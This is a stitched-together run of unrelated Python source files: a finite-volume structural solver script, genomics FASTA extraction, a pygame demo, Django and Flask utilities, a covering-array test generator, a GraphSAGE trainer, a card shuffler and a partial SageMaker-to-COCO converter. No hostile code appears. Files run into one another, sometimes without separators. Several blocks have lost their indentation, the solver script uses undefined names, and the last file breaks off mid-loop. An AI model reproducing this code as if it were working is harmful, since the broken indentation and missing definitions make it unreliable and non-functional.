    if len(sys.argv) < 2:
        usage()
    fileBase = sys.argv[1]
    if len(sys.argv) == 3:
        outfile = sys.argv[2]
if outfile == None:
    outfile = fileBase+"-prism.dat"
# Read the Fluent case file and build mesh metrics.
reader = FluentCase(fileBase+".cas")
#import debug
reader.read();
meshes = reader.getMeshList()
mesh = meshes[0]
nmesh = 1
import time
t0 = time.time()
geomFields = models.GeomFields('geom')
metricsCalculator = models.MeshMetricsCalculatorA(geomFields,meshes)
metricsCalculator.init()
cells = mesh.getCells()
# Material parameters — density, Young's modulus, Poisson ratio.
# NOTE(review): values look like steel in SI units — confirm.
rho = 7854.0
E = 2.1*math.pow(10,11)
nu = 0.25
if fvm.atype == 'tangent':
    metricsCalculator.setTangentCoords(0,7,1)
#reader.importStructureBCs(smodel)
bcMap = smodel.getBCMap()

def _setZeroTraction(bc):
    # Traction-free boundary: all nine stress components set to zero.
    # (Replaces two byte-identical 9-line blocks in the original.)
    bc.bcType = 'SpecifiedTraction'
    for comp in ('XX', 'XY', 'XZ', 'YX', 'YY', 'YZ', 'ZX', 'ZY', 'ZZ'):
        bc['specified%sTraction' % comp] = 0

# left (id 6): clamped — zero deformation in all directions
bcID = 6
if bcID in bcMap:
    bc = bcMap[bcID]
    bc.bcType = 'SpecifiedDeformation'
    bc['specifiedXDeformation'] = 0
    bc['specifiedYDeformation'] = 0
    bc['specifiedZDeformation'] = 0
# top (id 5): traction-free
bcID = 5
if bcID in bcMap:
    _setZeroTraction(bcMap[bcID])
# right (id 4): distributed force load in -y built by createBV4Fields
bcID = 4
if bcID in bcMap:
    bc = bcMap[bcID]
    force = createBV4Fields(geomFields, meshes, bcID)
    bc.bcType = 'SpecifiedDistForce'
    bc['specifiedXDistForce'] = 0.
    bc['specifiedYDistForce'] = force
    bc['specifiedZDistForce'] = 0.
# bottom (id 3): traction-free
bcID = 3
if bcID in bcMap:
    _setZeroTraction(bcMap[bcID])

# Material coefficients per volume condition.
# NOTE(review): eta = E/(2(1+nu)) is the shear modulus; eta1 looks like a
# Lame-style coefficient — confirm against the structure model's docs.
vcMap = smodel.getVCMap()
for i, vc in vcMap.iteritems():
    vc['density'] = rho
    vc['eta'] = E/(2.*(1+nu))
    vc['eta1'] = nu*E/((1+nu)*(1-1.0*nu))

# Linear solver: BCGStab preconditioned with AMG.
pc = fvmbaseExt.AMG()
pc.verbosity = 0
defSolver = fvmbaseExt.BCGStab()
defSolver.preconditioner = pc
defSolver.relativeTolerance = 1e-9
defSolver.absoluteTolerance = 1.e-30
defSolver.nMaxIterations = 6000
defSolver.verbosity = 1
soptions = smodel.getOptions()
soptions.deformationLinearSolver = defSolver
soptions.deformationTolerance = 1.0e-3
soptions.setVar("deformationURF", 1.0)
soptions.printNormalizedResiduals = True
soptions.transient = False
"""
if fvm.atype=='tangent':
vcMap = fmodel.getVCMap()
for i,vc in vcMap.iteritems():
print vc.getVar('viscosity')
vc.setVar('viscosity',(1.7894e-5,1))
"""
smodel.init()
dmodel.init()
smodel.printBCs
smodel.advance(numIterations)
dmodel.calculateNodeDisplacement()
#smodel.getTractionX(mesh)
faceCells = mesh.getAllFaceCells()
deformation = structureFields.deformation[mesh.getCells()].asNumPyArray()
fileName = fileBase + "deformation1.txt"
file = open(fileName,"w")
file.write("deformation\t\n")
for mesh in meshes:
fgs = mesh.getBoundaryGroups()
for fg in fgs:
nFaces = fg.site.getCount()
xf = geomFields.coordinate[fg.site].asNumPyArray()
if fg.id==4:
faceCells = mesh.getFaceCells(fg.site)
for i in range(0,nFaces):
x = xf[i][0]
y = xf[i][1]
def0 = deformation[faceCells(i,1)][0]
def1 = deformation[faceCells(i,1)][1]
file.write(" %e " % x)
file.write(" %e " % y)
file.write(" %e " % def0)
file.write(" %e " % def1)
file.write("\n")
file.close()
faceCells = mesh.getAllFaceCells()
deformation = structureFields.deformation[mesh.getCells()].asNumPyArray()
fileName = fileBase + "deformation1_bottom.txt"
file = open(fileName,"w")
file.write("deformation\t\n")
for mesh in meshes:
fgs = mesh.getBoundaryGroups()
for fg in fgs:
nFaces = fg.site.getCount()
xf = geomFields.coordinate[fg.site].asNumPyArray()
if fg.id==3:
faceCells = mesh.getFaceCells(fg.site)
for i in range(0,nFaces):
x = xf[i][0]
y = xf[i][1]
def0 = deformation[faceCells(i,1)][0]
def1 = deformation[faceCells(i,1)][1]
file.write(" %e " % x)
file.write(" %e " % y)
file.write(" %e " % def0)
file.write(" %e " % def1)
file.write("\n")
file.close()
t1 = time.time()
if outfile != '/dev/stdout':
print '\nsolution time = %f' % (t1-t0)
#dumpTecplotFile( nmesh, meshes, geomFields, options.type)
|
#!/usr/bin/env python
from graph_obj import Graph, Node, Edge
from graph_utils import revcomp
import argparse
def parse_args():
    """Parse command-line arguments: SV stat files, the graph, and output."""
    parser = argparse.ArgumentParser(description=__doc__,
                                     formatter_class=argparse.RawDescriptionHelpFormatter)
    parser.add_argument("-b", "--bialfile", help="biallelic sv stat file")
    parser.add_argument("-m", "--multifile", help="multiallelic sv stat file")
    parser.add_argument("-g", "--graphfile", help="graphfile")
    parser.add_argument("-o", "--outputfile", help="output file")
    return parser.parse_args()
def parse_bial_sv(stat, graph):
    """Extract the alt-allele sequence for a biallelic SV stat line.

    The line's fields are: name ... node-list (col 4) strand-list (col 5),
    both comma-separated; the single alt node is the second entry of each.
    A '-' strand yields the reverse complement of the node sequence.

    Returns (sv_name, sequence).
    """
    # Split once instead of re-splitting the line for every field.
    fields = stat.strip().split()
    sv_name = fields[0]
    nodeid = fields[3].split(",")[1]
    strand = fields[4].split(",")[1]
    if strand == "-":
        sequence = revcomp(graph[nodeid].nodeseq)
    else:
        sequence = graph[nodeid].nodeseq
    return (sv_name, sequence)
def parse_multi_sv(stat, graph):
    """Extract the alt-allele sequence for a multiallelic SV stat line.

    Node and strand lists (columns 4 and 5) are comma-separated with
    leading/trailing commas, hence the [1:-1] slice. '-' strands are
    reverse-complemented before concatenation.

    Returns (sv_name, sequence).
    """
    fields = stat.strip().split()
    sv_name = fields[0]
    node_ids = fields[3].split(",")[1:-1]
    strands = fields[4].split(",")[1:-1]
    pieces = []
    for node_id, strand in zip(node_ids, strands):
        seq = graph[node_id].nodeseq
        pieces.append(revcomp(seq) if strand == "-" else seq)
    return (sv_name, "".join(pieces))
if __name__ == "__main__":
    args = parse_args()
    bialfile = args.bialfile
    multifile = args.multifile
    graphfile = args.graphfile
    outputfile = args.outputfile
    # construct graph (with sequences, needed to emit FASTA records)
    graph = Graph.construct_from_rgfa(graphfile, include_seq=1)
    # process biallelic sv — one FASTA record per line.
    # NOTE(review): output is opened in append mode both times, so reruns
    # accumulate records in the same file — confirm intended.
    with open(bialfile) as infile, open(outputfile, "a") as outfile:
        for line in infile:
            sv_name, sequence = parse_bial_sv(line, graph)
            outfile.write(f">{sv_name}\n{sequence}\n")
    # process multiallelic sv
    with open(multifile) as infile, open(outputfile, "a") as outfile:
        for line in infile:
            sv_name, sequence = parse_multi_sv(line, graph)
            outfile.write(f">{sv_name}\n{sequence}\n")
|
import pygame, sys
from pygame.locals import *
import traceback
import jaime
pygame.init()
pygame.mixer.init()
BLACK = pygame.Color("black")
# Horizontal walking speed in pixels per frame; no vertical motion.
speed = [2, 0]
size = width, height = 600, 400
screen = pygame.display.set_mode(size, RESIZABLE)
pygame.display.set_caption("Jaime walking --- Lee Demo")
clock = pygame.time.Clock()
jme = jaime.Jaime(speed, size, [0, 0])
# index: current animation frame (0-4); num: countdown pacing the frames.
index = 0
num = 360
pos = [0, 0]
# Main loop: handle events, move the sprite, redraw at 30 FPS.
while True:
    for event in pygame.event.get():
        if event.type == QUIT:
            pygame.quit()
            sys.exit()
        if event.type == VIDEORESIZE:
            # Recreate the window and sprite at the new size, keeping the
            # current position and facing direction.
            screen = pygame.display.set_mode(event.size, RESIZABLE)
            size = width, height = event.size
            jme = jaime.Jaime(speed, size, pos, jme.turn)
    screen.fill(BLACK)
    jme.move()
    pos = jme.rect.left, jme.rect.top
    screen.blit(jme.image_list[index], jme.rect)
    pygame.display.update()
    clock.tick(30)
    # Advance the animation frame every 5th tick, cycling frames 0-4.
    if not (num % 5):
        if index >= 4:
            index = 0
        else:
            index += 1
    if num <= 0:
        num = 360
    else:
        num -= 1
from django.apps import AppConfig
class ReplyConfig(AppConfig):
    """Django application configuration for the `reply` app."""
    # Use 64-bit auto-incrementing primary keys for models by default.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'reply'
|
import runpy
from setuptools import setup, find_packages
# Read the package version without importing batchlib (which may have
# unmet dependencies at install time).
__version__ = runpy.run_path("batchlib/__version__.py")["__version__"]
setup(
    name="batchlib",
    packages=find_packages(exclude=["test"]),
    version=__version__,
    url="https://github.com/hci-unihd/batchlib.git",
    author="Constantin Pape, Roman Remme, Adrian Wolny, Steffen Wolf, Lorenzo Cerrone"
)
|
# Biased Covering Array Algorithm - Andrew Ragland - 2021
import itertools
import random
# calculate a candidate's benefit value
def calc_candidate_benefit(tuples, candidate):
can_benefit = 0
tuple_count = 0
pairs = list(itertools.combinations(candidate, 2))
for pair in pairs:
for tup in list(tuples.items()):
if tup[0] == pair:
can_benefit += tup[1]
tuple_count += 1
return can_benefit, tuple_count
# build a candidate out of a list of pairs
def build_candidate(cvr, pairs):
candidate = [-1] * len(cvr)
for pair in pairs:
for fct in cvr:
if pair[0] in fct:
candidate[cvr.index(fct)] = pair[0]
elif pair[1] in fct:
candidate[cvr.index(fct)] = pair[1]
return candidate
# perform pair generation using the recursive method
def two_way_recursion(depth, t, b, f, tuples, cvr, bft):
if depth == 2:
tuples.update({t: b})
else:
for fct in range(f, len(cvr)):
for lvl in cvr[fct]:
nest_t = t + (lvl,)
nest_b = round(b * bft[fct][cvr[fct].index(lvl)], 2)
two_way_recursion(depth + 1, nest_t, nest_b, fct + 1, tuples, cvr, bft)
def generate_biased_suite(covering_array, benefit_array, exclusion_array):
    """Greedy biased covering-array construction for pairwise testing.

    Repeatedly seeds a candidate from a randomly-chosen maximum-benefit
    uncovered pair, greedily fills the remaining factors, repairs any
    excluded pairs, and removes the pairs the finished candidate covers.
    Uses `random`, so output varies between runs.

    :param covering_array: list of per-factor level lists
    :param benefit_array: benefit weights parallel to covering_array
    :param exclusion_array: pairs that must not appear in any test
    :returns: list of candidate tests (lists of factor values)
    """
    cover_arr = covering_array
    benefit_arr = benefit_array
    exclusions = exclusion_array
    tuples = dict()
    test_suite = []
    # Enumerate every 2-way tuple with its weighted benefit.
    two_way_recursion(0, (), 1, 0, tuples, cover_arr, benefit_arr)
    # exclusions - remove excluded pairs from the list of tuples
    if exclusions:
        for e in exclusions:
            tuples.pop(e)
    # Sort descending by benefit so the head holds the best pairs.
    tuples = dict(sorted(tuples.items(), key=lambda item: item[1], reverse=True))
    while tuples:
        # store pairs where their benefit values are both maximum and equal
        eq_benefit_list = []
        eq_benefit_val = list(tuples.items())[0][1]
        factor_order = list(range(len(cover_arr)))
        random.shuffle(factor_order)
        for t in list(tuples.items()):
            if t[1] < eq_benefit_val:
                break
            else:
                eq_benefit_list.append(t[0])
        # random check: break ties among equally-beneficial pairs randomly
        init_tuple = random.choice(eq_benefit_list)
        init_can = build_candidate(cover_arr, [init_tuple])
        best_can = []
        # Greedily assign each unset factor the level maximizing benefit
        # (or covered-pair count) of the partial candidate.
        for f in factor_order:
            max_benefit = 0
            max_count = 0
            if init_can[f] == -1:
                for val in cover_arr[f]:
                    init_can[f] = val
                    benefit, count = calc_candidate_benefit(tuples, init_can)
                    if benefit > max_benefit or count > max_count:
                        best_can = init_can.copy()
                        max_benefit = benefit
                        max_count = count
        # perform exclusions
        pairs = list(itertools.combinations(best_can, 2))
        final_can = []
        for p in pairs:
            if p in exclusions:
                # start exclusion process, determine pair indicies
                exc_benefit = 0
                exc_count = 0
                indices = [-1] * 2
                for i in range(len(cover_arr)):
                    if p[0] in cover_arr[i]:
                        indices[0] = i
                    elif p[1] in cover_arr[i]:
                        indices[1] = i
                # Try replacing either side of the excluded pair and keep
                # whichever repaired candidate scores best.
                for ind in indices:
                    exc_can = best_can.copy()
                    for val in cover_arr[ind]:
                        if val not in p:
                            exc_can[ind] = val
                    benefit, count = calc_candidate_benefit(tuples, exc_can)
                    if benefit > exc_benefit or count > exc_count:
                        final_can = exc_can.copy()
                        exc_benefit = benefit
                        exc_count = count
            else:
                final_can = best_can.copy()
        # Remove every pair the chosen candidate now covers.
        # NOTE(review): if final_can ends up empty while tuples remain,
        # nothing shrinks and this loop would not terminate — confirm
        # inputs guarantee a non-empty candidate each round.
        final_pairs = list(itertools.combinations(final_can, 2))
        for p in final_pairs:
            for t in list(tuples.items()):
                if t[0] == p:
                    tuples.pop(t[0])
                    break
        if final_can:
            test_suite.append(final_can)
    return test_suite
|
import numpy as np
from opexebo import errors
def walk_filter(speed: np.ndarray, speed_cutoff: float, *args, fmt="remove"):
    """
    It is common practice when studying a freely moving subject to exclude data
    from periods when the subject was stationary, or nearly stationary. This
    method is described as a "walk-filter" - a high-pass filter on subject speed.

    This function allows an arbitrary number of arrays to be filtered in parallel
    to the speed (or whatever other filtering criteria are used). Filters can be
    performed either by removing the unwanted elements, or by masking them and
    returning a MaskedArray.

    Example
    -------
    Filter speed only

    >>> speed = np.arange(500)
    >>> cutoff = 200
    >>> speed = walk_filter(speed, cutoff, fmt="remove")
    >>> speed.size
    300

    Filter other arrays as well

    >>> speed = np.arange(500)
    >>> cutoff = 200
    >>> pos_x = np.linspace(-25, 73, speed.size)
    >>> pos_y = np.linspace(0, 98, speed.size)
    >>> speed, pos_x, pos_y = walk_filter(speed, cutoff, pos_x, pos_y, fmt="remove")
    >>> speed.size
    300
    >>> pos_x.size
    300

    Parameters
    ----------
    speed : np.ndarray
        Array of speeds for other data points
    speed_cutoff : float
        The cutoff, below which values in ``speed`` will be excluded.
    *args : np.ndarray, optional
        Any other arrays that should be filtered in parallel with speed.
        Optional arguments here _must_ be np.ndarrays with size equal to that of
        ``speed``
    fmt : str, optional
        Either "remove" or "mask". Determines how the values are returned
        "remove" (default) - the invalid values are removed from the array
        "mask" - the original array is returned as a MaskedArray, with the invalid
        values masked out.

    Returns
    -------
    np.ndarray
        Filtered copy of ``speed``
    [np.ndarray]
        Arbitrary other filtered arrays, if any other arrays were provided as *args

    Raises
    ------
    errors.ArgumentError
        If any argument has an invalid type, shape, or value.
    """
    if not isinstance(speed, np.ndarray):
        raise errors.ArgumentError("`speed` should be an ndarray, not ({})".format(type(speed)))
    if not isinstance(speed_cutoff, (float, int)):
        raise errors.ArgumentError("`speed_cutoff` should be a numeric value ({})".format(type(speed_cutoff)))
    if speed_cutoff <= 0 or not np.isfinite(speed_cutoff):
        # Fixed message: it previously began with a stray "\s" escape instead
        # of an opening backtick.
        raise errors.ArgumentError("`speed_cutoff` should be a finite positive value")
    fmt = fmt.lower()
    if fmt not in ("remove", "mask"):
        raise errors.ArgumentError("`fmt` should be either 'remove' or 'mask'")
    for i, arg in enumerate(args):
        if not isinstance(arg, np.ndarray):
            raise errors.ArgumentError(f"`args[{i}]` is not a Numpy array ({arg})")
        if not arg.shape == speed.shape:
            raise errors.ArgumentError(f"`args[{i}]` is a different size to `speed`")
    good = speed >= speed_cutoff
    if fmt == "mask":
        bad = np.logical_not(good)
        speed = np.ma.masked_where(bad, speed)
        out_args = [np.ma.masked_where(bad, arg) for arg in args]
    else:  # fmt == "remove", guaranteed by the validation above
        speed = speed[good]
        out_args = [arg[good] for arg in args]
    if out_args:
        out_args.insert(0, speed)
        return out_args
    else:
        return speed
|
import torch
import torch.nn as nn
from torch.nn import init
from torch.autograd import Variable
import numpy as np
import time
import random
from sklearn.metrics import f1_score
from collections import defaultdict
from graphsage.encoders import Encoder
from graphsage.aggregators import MeanAggregator
"""
Simple supervised GraphSAGE model for directed graph as well as examples running the model
on the Cora datasets.
"""
class SupervisedGraphSage(nn.Module):
    """Supervised GraphSAGE classifier: a single linear layer over node embeddings.

    ``enc`` is any callable with an ``embed_dim`` attribute that maps node ids
    to a ``(embed_dim, num_nodes)`` embedding matrix.
    """

    def __init__(self, num_classes, enc):
        super(SupervisedGraphSage, self).__init__()
        self.enc = enc
        self.xent = nn.CrossEntropyLoss()
        self.weight = nn.Parameter(torch.FloatTensor(num_classes, enc.embed_dim))
        # Fix: init.xavier_uniform is deprecated (and removed in recent torch
        # releases); use the in-place variant, which performs the same init.
        init.xavier_uniform_(self.weight)

    def forward(self, nodes):
        embeds = self.enc(nodes)         # (embed_dim, num_nodes)
        scores = self.weight.mm(embeds)  # (num_classes, num_nodes)
        return scores.t()                # (num_nodes, num_classes)

    def loss(self, nodes, labels):
        # labels: (num_nodes, 1) int64; squeezed for CrossEntropyLoss.
        scores = self.forward(nodes)
        return self.xent(scores, labels.squeeze())
def load_cora():
    """Read the Cora content/cites files into features, labels, and a directed
    adjacency structure (out-links and in-links per paper)."""
    n_nodes = 2708
    n_feats = 1433
    features = np.zeros((n_nodes, n_feats))
    labels = np.empty((n_nodes, 1), dtype=np.int64)
    node_index = {}
    class_index = {}
    with open("cora/cora.content") as content:
        for row, raw in enumerate(content):
            fields = raw.strip().split()
            # Column 0 is the paper id, the last column is the class label.
            features[row, :] = [float(v) for v in fields[1:-1]]
            node_index[fields[0]] = row
            if fields[-1] not in class_index:
                class_index[fields[-1]] = len(class_index)
            labels[row] = class_index[fields[-1]]
    adjacency = defaultdict(lambda: defaultdict(set))
    with open("cora/cora.cites") as cites:
        for raw in cites:
            fields = raw.strip().split()
            citing = node_index[fields[0]]
            cited = node_index[fields[1]]
            adjacency[citing]["out"].add(cited)
            adjacency[cited]["in"].add(citing)
    return features, labels, adjacency
def run_cora():
    """Train the two-layer supervised GraphSAGE model on Cora and report
    validation micro-F1 and mean batch time."""
    np.random.seed(1)
    random.seed(1)
    num_nodes = 2708
    feat_data, labels, adj_lists = load_cora()
    # Frozen embedding table holding the raw node features.
    features = nn.Embedding(2708, 1433)
    features.weight = nn.Parameter(torch.FloatTensor(feat_data), requires_grad=False)
   # features.cuda()
    agg1 = MeanAggregator(features, cuda=True)
    enc1 = Encoder(features, 1433, 128, adj_lists, agg1, gcn=False, cuda=False)
    # Second layer aggregates over the first layer's (transposed) outputs.
    agg2 = MeanAggregator(lambda nodes : enc1(nodes).t(), cuda=False)
    enc2 = Encoder(lambda nodes : enc1(nodes).t(), enc1.embed_dim, 128, adj_lists, agg2,
            base_model=enc1, gcn=False, cuda=False)
    enc1.num_samples = 5
    enc2.num_samples = 5
    graphsage = SupervisedGraphSage(7, enc2)
#    graphsage.cuda()
    # 1000 test / 500 validation / remainder training split.
    rand_indices = np.random.permutation(num_nodes)
    test = rand_indices[:1000]
    val = rand_indices[1000:1500]
    train = list(rand_indices[1500:])
    optimizer = torch.optim.Adam(filter(lambda p : p.requires_grad, graphsage.parameters()), lr=0.001)
    times = []
    for batch in range(100):
        # NOTE(review): the batch is taken BEFORE shuffling, so the first batch
        # uses the unshuffled order — matches the upstream GraphSAGE example,
        # but confirm it is intentional.
        batch_nodes = train[:256]
        random.shuffle(train)
        start_time = time.time()
        optimizer.zero_grad()
        loss = graphsage.loss(batch_nodes,
                Variable(torch.LongTensor(labels[np.array(batch_nodes)])))
        loss.backward()
        optimizer.step()
        end_time = time.time()
        times.append(end_time-start_time)
        print(batch, loss.item())
    val_output = graphsage.forward(val)
    print("Validation F1:", f1_score(labels[val], val_output.data.numpy().argmax(axis=1), average="micro"))
    print("Average batch time:", np.mean(times))
# Script entry point: train and evaluate on Cora.
if __name__ == "__main__":
    run_cora()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Set of some useful management commands,
based on :py:mod:`script extension <flask.ext.script>`
(:py:class:`flask.ext.Manager`)
A set of scripts, based on :py:mod:`script extension <flask.ext.script>`
that you may find useful.
The set of available commands will grow over time.
By now, there are:
+-----------------------+-----------------------------------------------------------------+
| **Command** | **Result** |
+=======================+=================================================================+
| runserver | Runs the Flask development server i.e. app.run() |
+-----------------------+-----------------------------------------------------------------+
| shell | Runs interactive shell, ipython if installed |
+-----------------------+-----------------------------------------------------------------+
| init_data | Creates some demo DB-tables and data |
+-----------------------+-----------------------------------------------------------------+
| clean_pyc | Removes all file:`*.pyc` files from the project folder |
+-----------------------+-----------------------------------------------------------------+
.. todo::
Add assets managements, as described in :data:`flask.ext.assets.management-command`
:copyright: \(c) 2012 by Roman Semirook.
:copyright: \(c) 2014 by Michelle Baert.
:license: BSD, see LICENSE for more details.
"""
import subprocess
from pathlib import Path

from flask.ext.script import Shell, Manager

from app import app
from base import User
from ext import db
# Central command registry for this manage script.
manager = Manager(app)
"""
The :py:class:`Manager` object from the :py:mod:`script extension <flask.ext.script>`
"""
@manager.command
def clean_pyc():
    """Removes all :file:`*.pyc` files from the project folder"""
    # Use pathlib instead of shelling out to `find`: portable (works on
    # Windows too) and independent of an external binary being on PATH.
    for pyc in Path(".").rglob("*.pyc"):
        pyc.unlink()
@manager.command
def init_data():
    """Fish data for project"""
    # Recreate the schema from scratch, then seed the admin account
    # from the application's configuration.
    db.drop_all()
    db.create_all()
    cfg = app.config
    admin = User(
        username=cfg['ADMIN_USERNAME'],
        email=cfg['ADMIN_EMAIL'],
        password=cfg['ADMIN_PASSWORD'],
    )
    admin.save()
# The interactive shell exposes the Flask app and the DB handle by default.
manager.add_command('shell', Shell(make_context=lambda:{'app': app, 'db': db}))
if __name__ == '__main__':
    manager.run()
|
from typing import Tuple
from click._unicodefun import click
from exaslct_src.cli.cli import cli
from exaslct_src.cli.common import set_build_config, set_docker_repository_config, run_tasks, add_options, \
import_build_steps
from exaslct_src.cli.options \
import build_options, flavor_options, system_options, release_options, \
docker_repository_options
from exaslct_src.lib.export_containers import ExportContainers
@cli.command()
@add_options(flavor_options)
@add_options(release_options)
@click.option('--export-path', type=click.Path(exists=False, file_okay=False, dir_okay=True), default=None)
@click.option('--release-name', type=str, default=None)
@add_options(build_options)
@add_options(docker_repository_options)
@add_options(system_options)
def export(flavor_path: Tuple[str, ...],
           release_type: str,
           export_path: str,
           release_name: str,
           force_rebuild: bool,
           force_rebuild_from: Tuple[str, ...],
           force_pull: bool,
           output_directory: str,
           temporary_base_directory: str,
           log_build_context_content: bool,
           cache_directory: str,
           build_name: str,
           source_docker_repository_name: str,
           source_docker_tag_prefix: str,
           source_docker_username: str,
           source_docker_password: str,
           target_docker_repository_name: str,
           target_docker_tag_prefix: str,
           target_docker_username: str,
           target_docker_password: str,
           workers: int,
           task_dependencies_dot_file: str):
    """
    This command exports the whole script language container package of the flavor,
    ready for the upload into the bucketfs. If the stages do not exists locally,
    the system will build or pull them before the exporting the packaged container.
    """
    # Register the flavor's build steps, then push the global build and
    # docker-repository configuration before any tasks are constructed.
    import_build_steps(flavor_path)
    set_build_config(force_rebuild,
                     force_rebuild_from,
                     force_pull,
                     log_build_context_content,
                     output_directory,
                     temporary_base_directory,
                     cache_directory,
                     build_name)
    set_docker_repository_config(source_docker_password, source_docker_repository_name, source_docker_username,
                                 source_docker_tag_prefix, "source")
    set_docker_repository_config(target_docker_password, target_docker_repository_name, target_docker_username,
                                 target_docker_tag_prefix, "target")

    def tasks():
        # One export task covering every requested flavor path.
        return [ExportContainers(flavor_paths=list(flavor_path),
                                 release_types=[release_type],
                                 export_path=export_path,
                                 release_name=release_name)]

    def print_command_line_output():
        # Echo the recorded command-line output of the export task.
        with ExportContainers.command_line_output_target.open("r") as f:
            print(f.read())

    run_tasks(tasks, workers, task_dependencies_dot_file, on_success=print_command_line_output)
|
from django.db.models.signals import pre_save, post_save, post_delete
from django.dispatch import receiver
from django.utils import timezone
from slugify import slugify
from .models import Category, Document, FileStatistic
@receiver(pre_save, sender=Document)
def presave_fields(sender, instance, *args, **kwargs):
    """Pre-save hook: keep the publication timestamp in sync with the
    `is_published` flag and record the document's file extension."""
    published = instance.is_published
    if published and instance.published_at is None:
        instance.published_at = timezone.now()
    elif not published and instance.published_at is not None:
        instance.published_at = None
    # Everything after the final dot (or the whole name if there is none).
    instance.file_format = instance.file.name.rsplit('.', 1)[-1]
@receiver(pre_save, sender=Category)
@receiver(pre_save, sender=Document)
def presave_slug(sender, instance, *args, **kwargs):
    """Pre-save hook that fills the slug field.

    The stock django slugify is deliberately not used because it cannot
    handle Cyrillic text; the external ``slugify`` package is used instead.
    """
    kind = type(instance).__name__
    if kind == "Document":
        instance.slug = slugify(instance.title)
    elif kind == "Category":
        instance.slug = slugify(instance.name)
@receiver(post_save, sender=Document)
def create_favorites(sender, instance, created, **kwargs):
    """Attach a fresh FileStatistic record to every newly created Document."""
    if not created:
        return
    stats = FileStatistic()
    stats.save()
    instance.statistic = stats
    instance.save()
@receiver(post_delete, sender=Document)
def delete_statistic(sender, instance, **kwargs):
    """Post-delete hook: remove the Document's related FileStatistic row.

    Bug fix: the previous version called ``save()`` on the just-deleted
    statistic and then on the just-deleted document, which re-inserted the
    rows that had been removed. Only the statistic deletion is needed here.
    """
    if instance.statistic is not None:
        instance.statistic.delete()
import random
import itertools
# from deck_of_cards import deck_of_cards # pip install deck-of-cards
# Build a 52-card deck as (rank, suit) tuples via the cartesian product.
ranks = ("Ace", 2, 3, 4, 5, 6, 7, 8, 9, 10, "Jack", "Queen", "King")
suits = ("Clubs", "Diamonds", "Hearts", "Spades")
cards = list(itertools.product(ranks, suits))
print("\nKāršu kava:\n", cards)  # "Card deck"
def get_shuffled_cards(cards):
    """Return a shuffled copy of the given card sequence (input untouched)."""
    shuffled = list(cards)
    random.shuffle(shuffled)
    print("\nSajauktā kāršu kava:\n", shuffled)
    return shuffled
def get_random_sample(cards, count=1):
    """Draw ``count`` distinct random cards from the sequence."""
    pool = list(cards)
    drawn = random.sample(pool, count)
    print("\nKārts no vrknes:\n", drawn)
    return drawn
def get_random_sample_list(cards):
    """Return a full-length random permutation of the card sequence."""
    pool = list(cards)
    reshuffled = random.sample(pool, len(pool))
    print("\nJauna sajaukta kāršu kava:\n", reshuffled)
    return reshuffled
# Demo: exercise each helper with the full deck.
my_shuffled_cards = get_shuffled_cards(cards)
random_sample = get_random_sample(cards, 10)
get_random_sample_list(cards)
print(my_shuffled_cards[:10])
print(random_sample)
# Extra itertools.product demo with three independent sequences.
print(list(itertools.product(range(5), list("abcd"), ["green", "red"])))
from PyQt5 import QtWidgets
class MainWindow(QtWidgets.QMainWindow):
    """Minimal main window holding a single empty central widget."""

    def __init__(self, parent=None):
        super(MainWindow, self).__init__(parent)
        central = QtWidgets.QWidget()
        self.setCentralWidget(central)
if __name__ == '__main__':
    import sys
    # Standard Qt bootstrap: create the application, show the window,
    # and hand control to the event loop until it exits.
    app = QtWidgets.QApplication(sys.argv)
    w = MainWindow()
    w.show()
    sys.exit(app.exec())
|
import argparse
import base64
import glob
import io
import json
import os
import random
import pycocotools
import cv2
import imageio
from PIL import Image, ImageColor, ImageDraw
import numpy as np
from pycocotools import mask
from skimage import measure
# Category name -> COCO category id, and display colour per category.
CAT_TO_ID = dict(egg=1, blob=2)
CAT_TO_COLOR = dict(egg="#f00562", blob="#d63526")
def r():
    """Return a random colour-channel value in [0, 255]."""
    return random.randint(0x00, 0xFF)
def options():
    """Parse and return the command-line options for the conversion script."""
    parser = argparse.ArgumentParser(
        description="Convert Amazon SageMaker instance segmentation data to COCO format"
    )
    parser.add_argument(
        "annotDir",
        metavar="path/to/annots",
        help="path to the directory containing the raw annotation data from Amazon",
    )
    parser.add_argument(
        "manifest",
        metavar="path/to/manifest",
        help="path to the manifest file associated with the labelling job",
    )
    parser.add_argument(
        "imgsDir",
        metavar="path/to/imgs",
        help="path to the directory containing all possible training/eval images",
    )
    parser.add_argument(
        "--remove_completed_from_manifest",
        action="store_true",
        help="whether to create a copy of the manifest file in the same folder as"
        " the current one, removing file name entries corresponding to images that"
        " have been annotated already.",
    )
    parser.add_argument(
        "--worker_ignore_list",
        help="path to a newline-separated file of worker IDs whose annotations"
        " should be ignored in the annotation data. Any images completed by these"
        " workers will also not be omitted from the new copy of the manifest file"
        " if the --remove_completed_from_manifest option is enabled.",
    )
    return parser.parse_args()
# Flat script: everything below runs at import time.
opts = options()
# All candidate images, alphabetized so their list index is a stable image id.
alphabetizedImgList = [
    imgPath for imgPath in sorted(glob.glob(os.path.join(opts.imgsDir, "*.jpg")))
]
alphabetizedImgListBaseNames = [
    os.path.basename(imgPath) for imgPath in alphabetizedImgList
]
# Accumulator in COCO layout; filled by the loop below.
cocoOutput = dict(annotations=[], categories=[], images=[])
jsonAnnots = glob.glob(os.path.join(opts.annotDir, "*.json"))
# The manifest order defines the datasetObjectId -> image-name mapping.
with open(opts.manifest) as f:
    labelledImgs = [
        os.path.basename(json.loads(imgLine)["source-ref"]) for imgLine in f.readlines()
    ]
print("labeled images before starting iterations")
print(labelledImgs)
if opts.remove_completed_from_manifest:
    completed_images = []
if opts.worker_ignore_list:
    num_images_ignored = 0
    with open(opts.worker_ignore_list) as f:
        workers_to_ignore = f.read().splitlines()
# Globally increasing id for every annotation instance across all files.
instance_id = 0
# Main conversion loop: one SageMaker consolidated-annotation JSON per pass.
for jsonFile in jsonAnnots:
    with open(jsonFile) as f:
        jsonData = json.load(f)
        # Labelling-job/task name; assumed identical for every entry in the file.
        taskName = list(jsonData[0]["consolidatedAnnotation"]["content"].keys())[0]
        for image_data in jsonData:
            imgName = labelledImgs[int(image_data["datasetObjectId"])]
            # Only the first worker's annotations are ever used.
            workerId = image_data['consolidatedAnnotation']['content'][taskName]['annotationsFromAllWorkers'][0]['workerId']
            if opts.worker_ignore_list and workerId in workers_to_ignore:
                print(f"Skipping image {imgName} because it was completed by ignored worker {workerId}")
                num_images_ignored += 1
                continue
            if opts.remove_completed_from_manifest:
                completed_images.append(imgName)
            imgId = alphabetizedImgListBaseNames.index(imgName)
